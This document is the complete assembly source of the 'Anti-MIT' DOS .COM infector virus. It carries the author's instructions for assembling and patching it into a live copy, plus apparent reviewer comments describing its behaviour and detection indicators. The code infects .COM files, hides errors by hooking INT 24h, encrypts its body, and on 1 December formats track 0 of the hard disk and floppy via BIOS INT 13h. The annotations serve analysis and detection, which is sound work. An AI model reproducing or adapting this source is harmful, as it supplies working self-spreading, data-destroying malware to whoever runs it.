; ** Anti-MIT Virus **
; To assemble, use TASM and TLINK to create a .COM file. Next
; run the .COM file in the same directory of a file you want to infect.
; Your system may hang, but after re-booting you will notice an increase
; in the target files size. Now debug the newly infected file and replace
; the first three bytes with E8 05 00 (call to encryption). Re-write the
; .COM file and now you should have a running copy of the Anti-Mit virus!
;
; - Do not distribute the Anti-MIT virus for this
; activity is against the law! The author will take
; NO responsibility for others.
; TEST ONLY
;
; For more info see MIT.DOX file.
; Anti-MIT: DOS .COM infector (TASM/MASM syntax, 16-bit real mode).
; The reviewer notes throughout this listing describe observed behaviour for
; analysis and detection purposes; the code itself is left byte-identical.
;
; What the listing shows:
;   - prepends itself to one *.COM file in the current directory per run,
;     relocating the overwritten host bytes to the end of the file;
;   - marks infected files by forcing the DOS time-stamp seconds field to
;     31 ("62 seconds") and skips files that already carry that mark;
;   - skips hosts smaller than 500 or larger than 19000 bytes;
;   - XOR-encrypts the range [data, stop_encrypt) with a one-byte key taken
;     from the clock seconds before writing itself into the host;
;   - on 1 December prints 'MIT Sux!' and issues BIOS INT 13h format-track
;     requests against the first fixed disk (DL=80h) and floppy A: (DL=00h).
name AntiMIT
title Anti-MIT: The original Anti-MIT virus code!
; Unsuffixed numbers below are hexadecimal; a trailing 'd' marks decimal.
.radix 16
code segment
assume cs:code,ds:code
; .COM image: loaded at CS:100h with CS=DS=ES=SS.
org 100

; Work area at offset 20000 (decimal) in the load segment, well above the
; virus image.  It serves both as the DTA for FindFirst/FindNext and as the
; read buffer for the host's first bytes, so a successful read at mainlp
; overwrites the search record (fname/ftime/fsize) below.
buffer equ offset 20000d ; Buffer
; DOS FindFirst DTA record fields, relative to the DTA base.
fname equ offset 20000d + 1eh ; DTA - File name
ftime equ offset 20000d + 16h ; DTA - File time
fsize equ offset 20000d + 1ah ; DTA - File size
; 80h is the default DTA inside the PSP; reinstated at date_stuff.
olddta equ 80 ; Old DTA area
; Entry point.  As assembled, the first three bytes are an unconditional
; 'jmp main', so the decrypt stub below is never reached in this build; the
; header comment describes the manual patch that turns them into a call.
start:
jmp main ; *See above*
nop
jmp main ; Jmp to virus body

; One-byte XOR key; loaded from the clock seconds at stop_encrypt.
encrypt_val db 0 ; Randomized encryption value

; XOR engine.  XOR with a single byte is its own inverse, so one routine
; both encrypts and decrypts.  It transforms the range [data, stop_encrypt)
; in place (si and di both point at 'data'; es=ds=cs in a .COM image).
; Everything before 'data' -- this stub included -- is stored in clear in
; every copy, which makes it a stable static signature.
; In:  encrypt_val = key.  Clobbers: ax, cx, dx, si, di, flags.
decrypt: ; Encrypt/decrypt engine
encrypt: ; [SKISM type]
lea si, data
mov ah, encrypt_val
jmp fool_em ; Fool with the scanners

; cx = bytes remaining; al = *si++ ^ key -> *di++.
xor_loop:
lodsb ; ds:[si] -> al
xor al, ah
stosb ; al -> es:[di]
loop xor_loop
; Tail after the loop: AH=19h returns the current drive in AL, which is then
; copied into DH; AH=0Eh (select default drive) takes its drive number from
; DL, which this code has not set, so the selected drive is whatever DL
; happened to hold at the call.
mov ah,19h ; Set current drive as default
int 21h
mov dh,al
mov ah,0eh
int 21h
ret

; Control-flow detour that only sets up the loop: di = si = data,
; cx = length of the encrypted range.
fool_em:
mov di, si
mov cx, stop_encrypt - data
jmp xor_loop
; Start of the encrypted region (it runs through stop_encrypt).  In the
; freshly assembled dropper these strings are plaintext; in an infected host
; they are stored XOR-ed with encrypt_val (a key of 0 leaves them in clear),
; so a string scan of a host finds them only after decryption.
data label byte ; Virus data
message db 'MIT Sux! $' ; The "message" -- '$'-terminated for INT 21h AH=09h
lengthp dw ? ; Length of infected file
allcom db '*.COM',0 ; What to search for
virus db '[Anti-MIT]',0 ; Virus name
; Non-ASCII bytes in the original; they render garbled on this page.
author db 'F<>rs<72>Str<74>k<EFBFBD>',0 ; Author
; Main body, reached directly via 'jmp main' from start.
; Trigger check first: INT 21h AH=2Ah returns the date with DH=month, DL=day.
main: ; Main virus code
mov ah,2ah ; Get the date
int 21h

cmp dh,12d ; Month 12?
jnz next ; No

cmp dl,01d ; Day one?
jnz next ; No
; 1 December: destructive payload.  Prints the '$'-terminated message, then
; drives the BIOS disk service (INT 13h) directly, bypassing DOS.
lea dx,message ; Yes, set off the "bomb"
mov ah,09h
int 21h

; INT 13h AH=05h = format track.  CH=00h/DH=00h select cylinder 0, head 0;
; DL=80h is the first fixed disk; AL is the service's sector-count/interleave
; argument.  Track 0 holds the boot code and partition table, so this is a
; data-destroying write, and an INT 13h AH=05h with DL=80h inside a .COM file
; is a strong static indicator on its own.
mov ah,05h
mov al,02h
mov ch,00h
mov dh,00h
mov dl,80h
int 13h

; AH=06h is the XT-era "format track and set bad-sector flags" service; the
; other registers are reused from the call above.
mov ah,06h
int 13h

; Same format request against DL=00h (first floppy drive).
mov ah,05h
mov dl,00h
int 13h

; Terminate without running any host.
mov ah,4ch ; Exit
int 21h
; Normal (non-trigger) path: infect one .COM in the current directory.
; lengthp is the host's original length (filled in at mainlp); the value
; lengthp - sizeof(virus) becomes the rel16 displacement of the hand-assembled
; 'jmp' at the end of the image (see jmp_code/the_jmp under done).
next:
mov cx,lengthp ; Figure out the Jmp
sub cx,eendcode-start
mov the_jmp,cx

; Hook INT 24h (the DOS critical-error handler) so that a disk or
; write-protect error during infection is answered by 'handler' (AL=0,
; ignore) instead of the "Abort, Retry, Fail?" prompt.  AH=35h returns the
; current vector in ES:BX; it is saved in err1/err2 for date_stuff.
push es ; Save ES
mov ax,3524h ; Get interrupt 24h handler
int 21h ; and save it in err1/err2
mov [err1],bx
mov [err2],es
pop es ; Restore ES

; AH=25h installs DS:DX (= cs:handler in a .COM image) as the INT 24h vector.
mov ax,2524h ; Set interrupt 24h handler
lea dx,handler
int 21h

; Point the DTA at 'buffer'.  si is zero here, so the add contributes
; nothing; the detour merely breaks up the obvious 'mov dx,buffer' sequence.
xor dx,dx ; Set DTA in "buffer" area
mov si,dx
mov dx,buffer
add dx,si ; Set new Disk Transfer Address
mov ah,1A ; Set DTA
int 21
; FindFirst for '*.COM' with attribute mask 1 (read-only files included).
; On success the DTA at 'buffer' holds the match (fname/ftime/fsize); carry
; set means no candidate, in which case control goes to the host hand-off.
find_first:
mov dx,offset allcom ; Search for '*.COM' files
mov cx,00000001b ; Normal, Write Protected
mov ah,4E ; Find First file
int 21
jc pre_done ; Quit if none found
jmp check_if_ill
; Host-restoring stub.  These bytes (through 'endcode', nop padding
; included) are appended to the victim right after its original contents
; and are the target of the 'jmp' at the end of the virus image.  They are
; written to the file *before* the in-memory encryption at stop_encrypt, so
; the stub is stored in clear in every infected host.
; Infected-file layout this stub relies on:
;   [virus, eendcode-start bytes][host bytes N..len][mover][host bytes 0..N)
; si = eendcode + the_jmp + (endcode-mover) = 100h + lengthp + sizeof(mover),
; i.e. the relocated original first N bytes; they are copied back over the
; virus at CS:100h and control is transferred there.
mover: ; The "mover" code
push cs ; Store CS
pop es ; and move it to ES
mov di,0100h
lea si,eendcode ; Move original code to
add si,the_jmp ; beginning
add si,endcode-mover
mov cx,eendcode-start
rep movsb
; 'the_jmp' and 'eendcode' are absolute offsets into the virus image still
; resident at 100h; the stub itself executes from its appended position.
mov di,0100h ; Jmp to CS:[100h]
jmp di
; Trampoline: 8086 conditional jumps are rel8 only and 'done' lies further
; away, so the error paths above branch here first.
pre_done:
jmp done ; Long jmp

; AH=4Fh continues the search using the DTA; carry set = no more files.
find_next:
mov ah,4fh ; Search for next
int 21h
jc pre_done
; Candidate filter.
; Infection marker: DOS packs seconds/2 into bits 0-4 of the time word, so
; the value 31 ("62 seconds") never occurs on a normally stamped file and is
; used as the already-infected mark (set at date_stuff).  Any .COM whose
; time-stamp seconds field reads 62 is a detection hit for this family.
check_if_ill: ; File infected?
mov ax,cs:[ftime]
and al,11111b ; Look for the 62 sec marker
cmp al,62d/2 ; [Vienna type]
jz find_next

; Size window: skip hosts above 19000 or below 500 bytes.  The DTA size
; field is 32 bits wide; only the word at fsize appears to be compared here.
cmp cs:[fsize],19000d ; Check if file larger than
ja find_next ; 19000 bytes - if so skip

cmp cs:[fsize],500d ; Check if file smaller than
jb find_next ; 500 bytes - if so skip
; Infect the file named in the DTA.  Error paths fall out to done without
; any cleanup of attributes, file handle or INT 24h vector.
; Step 1: clear the read-only attribute.  AH=43h/AL=0 returns the attribute
; word in CX; AL=1 writes it back with bit 0 (read-only) cleared.
mainlp: ; Write the virus
mov dx,fname
mov ah,43h ; Write enable
mov al,0
int 21h
mov ah,43h
mov al,01h
and cx,11111110b
int 21h

; Step 2: open read/write (AX=3D02h); BX = handle for the rest of the run.
mov ax,3d02h ; Open file (read/write)
int 21h
jc pre_done
mov bx,ax

; Step 3: save the host's time/date (AX=5700h -> CX=time, DX=date) so the
; stamp can be reinstated -- with the marker added -- after writing.
mov ax,5700h ; Get date for file
int 21h
mov [time],cx ; Save date info
mov [date],dx

; Step 4: read the first sizeof(virus) bytes of the host into 'buffer'.
; 'buffer' is also the DTA, so the search record is overwritten from here on.
mov ah,3fh ; Read original code into
mov dx,buffer ; buffer (length of virus)
mov cx,eendcode-start
int 21h
jc pre_done
cmp ax,eendcode-start
jne pre_done

; Step 5: seek to EOF (AH=42h, AL=2, offset 0).  DX:AX = file length; only
; the low word is kept in lengthp (hosts are capped at 19000 bytes anyway).
mov ah,42h ; Go to end of file
mov al,02h
xor cx,cx
xor dx,dx
int 21h
jc pre_done
mov cx,ax
mov lengthp,ax ; Save original program code

; Step 6: append the mover stub, then the saved original first bytes.
mov ah,40h ; Write "mover" code to end
lea dx,mover ; of file
mov cx,endcode-mover
int 21h
jc done
cmp ax,endcode-mover
jne done

mov ah,40h ; Write original program code
mov dx,buffer ; to end of the file
mov cx,eendcode-start
int 21h
jc done
cmp ax,eendcode-start
jne done

; Step 7: rewind to offset 0.
mov ah,42h ; Go to front of file
mov al,00h
xor cx,cx
xor dx,dx
int 21h
jc done

; End of the encrypted range.  From here on the code runs from the clear
; part of the image, which matters because the call below scrambles
; everything between 'data' and this label in memory.
stop_encrypt:
; Key = seconds (DH) from INT 21h AH=2Ch; a seconds value of 0 yields a
; null key and a plaintext copy.
mov ah,2ch ; Get time
int 21h

mov encrypt_val,dh ; Use time as random encryption
call encrypt ; value

; Step 8: overwrite the host's first sizeof(virus) bytes with the (now
; partly encrypted) virus image.  The entry bytes written are the plain
; 'jmp main' from start, not a call to the decrypt stub.
mov ah,40h ; Write virus code to front of
lea dx,start ; file
mov cx,eendcode-start
int 21h
jc done
cmp ax,eendcode-start
jne done
jmp date_stuff
; INT 24h replacement installed at 'next'.  Returning AL=0 tells DOS to
; ignore the critical error, so a write-protected or failing disk does not
; interrupt infection with a user prompt.
handler:
mov al,0
iret
; No matching PROC directive for this ENDP is visible on this page.
endp

; Saved host time-stamp and the original INT 24h vector (offset, segment).
; These live after stop_encrypt and are therefore never encrypted.
time dw ? ; File stamp - time
date dw ? ; File stamp - date
err1 dw ? ; Original error handler
err2 dw ? ; address
; Put the host's original time/date back with the seconds field forced to
; 31 (bits 0-4 all set) -- the "62 second" infection marker that
; check_if_ill tests for.  BX still holds the handle opened at mainlp.
date_stuff: ; Restore old file stamp
mov ax,5701h
mov cx,[time]
mov dx,[date]
and cl,not 11111b ; Set seconds field to 62 secs.
or cl,11111b
int 21h
; Close the handle (AH=3Eh, BX=handle) and move the DTA back to the PSP
; default at 80h.
mov ah,3eh
int 21h
mov dx,olddta ; Restore "original" DTA
mov ah,1ah
int 21h

; Intended restore of the INT 24h vector.  As written, dx is loaded with
; err1 and immediately overwritten with err2 before ds is loaded from dx,
; so AH=25h receives err2:err2 rather than err2:err1: the saved handler
; address is not reinstated, and INT 24h is left pointing at the wrong
; offset within the original handler's segment after every run.
push ds ; Save DS
mov ax,2524h ; Set interrupt 24h handler
mov dx,err1 ; Restore saved handler
mov dx,err2
mov ds,dx
int 21h
pop ds ; Restore DS
; Hand-off to the host.  Registers are zeroed, then a hand-assembled
; 'jmp rel16' (opcode E9h followed by the_jmp) transfers to the mover stub
; appended to the file.  The displacement is measured from 'go' (= eendcode),
; so the target is eendcode + lengthp - (eendcode - start) = 100h + lengthp:
; exactly where the stub landed when it was written at the host's old EOF.
; In the freshly assembled dropper lengthp has never been set, so where this
; jump lands depends on the assembler's value for 'dw ?' -- presumably
; related to the "system may hang" remark in the header; verify in a sandbox.
done:
xor cx,cx ; Clear registers
xor dx,dx
xor bx,bx
xor ax,ax
xor si,si
jmp_code db 0e9h ; Perform jmp to "mover" code
the_jmp dw ?

go:
; End of the bytes prepended to a host (eendcode - start).
eendcode label byte

; Five-byte nop padding; it lies between eendcode and endcode and is
; therefore copied into the host as part of the mover stub.
nop ; krap
nop
nop
nop
nop

; End of the mover stub (endcode - mover bytes).
endcode label byte
code ends
; Program entry point is 'start' (offset 100h in the load segment).
end start